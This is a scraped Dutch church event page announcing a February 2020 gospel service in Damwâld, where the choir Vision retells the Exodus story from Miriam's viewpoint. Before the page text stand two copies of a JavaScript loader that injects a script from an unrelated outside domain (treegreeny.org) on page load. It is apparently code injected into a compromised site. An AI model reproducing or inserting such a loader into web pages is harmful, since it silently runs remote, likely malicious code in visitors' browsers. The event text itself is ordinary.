;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Exodus .. speciale evangelisatiedienst - PKN Damwâld
16 februari 2020
14:00 t/m 15:00
de Ontmoeting
Exodus .. speciale evangelisatiedienst

Op zondagmiddag 16 februari is er in de Ontmoeting een dienst geleid door de gospelgroep Vision uit Assen. Gospelkoor Vision is in september 2001 ontstaan uit een gelegenheidskoor van de Nederlands Gereformeerde Kerk te Assen. De doelstelling van het koor is om zingend het evangelie uit te dragen met een afwisselend repertoire afwisselend, van ingetogen a-capella stukken tot swingende gospels in zowel Engelstalige als Nederlandstalige liederen.

Vision neemt ons mee in hun verhaal uit Exodus en vertellen over Mozes vanaf zijn geboorte t/m de uittocht door de Rode Zee. Uit het oogpunt van Mirjam ( zus van Mozes ) gaan we door middel van zang, beelden en vertelling door dit boeiende verhaal. Wat duidelijk naar voren komt is Gods trouw.

De dienst is geschikt voor jong en oud. Dus kom gezellig met de hele familie, nodig vriendjes en vriendinnetjes uit en laat u verrassen door deze boeiende dienst. Het belooft een prachtige middag te worden.

Oant sjen!!!

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld